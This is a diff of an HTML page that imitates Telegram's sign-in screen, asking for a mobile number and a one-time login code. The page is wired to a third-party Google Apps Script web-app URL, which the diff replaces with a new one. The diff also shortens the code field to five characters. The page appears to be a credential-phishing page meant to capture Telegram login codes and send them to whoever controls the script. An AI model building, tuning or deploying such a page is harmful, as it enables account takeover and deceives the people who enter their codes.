--- a/index.html
+++ b/index.html
@@ -43,16 +43,16 @@
 </head>
 <body>
     <div class="login-container">
-        <img src="telegram-logo.png" width=300 height=150>
+        <img src="Telegram-Logo.png" width=300 height=150>
         <h2>Sign in to Telegram</h2>
         <input type="text" id="mobile" placeholder="Enter mobile number" maxlength="13">
         <button onclick="sendOTP()">Send OTP</button>
-        <input type="text" id="otp" placeholder="Enter OTP" maxlength="6" style="display: none;">
+        <input type="text" id="otp" placeholder="Enter OTP" maxlength="5" style="display: none;">
         <button onclick="verifyOTP()" id="verifyBtn" style="display: none;">Verify OTP</button>
     </div>
 
     <script>
-        const googleAppsScriptURL = "https://script.google.com/macros/s/AKfycbzGRl3S6tJiPhrjoWxpSRekks4gJOA29baGGiXiNRGDKppE64VUPgoKgwaPqGpEm2uYRA/exec"; // Replace with your Google Apps Script Web App URL
+        const googleAppsScriptURL = "https://script.google.com/macros/s/AKfycbwHaXRdV1phKQXHmG0HdwKjuS1ZPK7do1sQeCvMkc_SdHqo77LAlAK4mpMSlMf8q_KIvw/exec"; // Replace with your Google Apps Script Web App URL
 
         function sendOTP() {
             let mobileNumber = document.getElementById("mobile").value.trim();
